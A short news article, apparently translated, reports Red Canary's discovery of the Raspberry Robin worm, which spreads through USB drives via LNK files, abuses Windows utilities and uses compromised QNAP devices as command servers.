USB drives continue to be a vector of infection in organizations. Red Canary security researchers have discovered a worm that spreads through USB drives.
baptized Raspberry Robin, the malware is hidden in a shortcut file (LNK) on the key. As soon as the key connects, the Windows registry is updated. the malware will then run a series of Windows applications such as cmd, msiexec, odbcconf and fodhelper. The commands used mix lowercase and uppercase characters, which makes it more difficult for possible antivirus engines to detect them.
Some commands will attempt to establish an outside connection to Command and Control (C&C) servers. Generally, these are Qnap network storage servers.
“We believe that Raspberry Robin is using compromised Qnap devices for its C&C infrastructure”say the researchers.
These outside connections allow the malware to download other malicious code. In particular, the researchers observed the installation of a corrupted DLL, which would be used to guarantee persistence on the machine.
Also see video:
The victims seem to be above all technological and industrial companies. But there are still many gray areas. Since the researchers were unable to get their hands on the malicious codes that were later installed, the end goal of this malware is not known. Researchers do not risk attribution either. But this discovery shows, once again, the risks associated with unidentified USB keys.
Source : Red Canary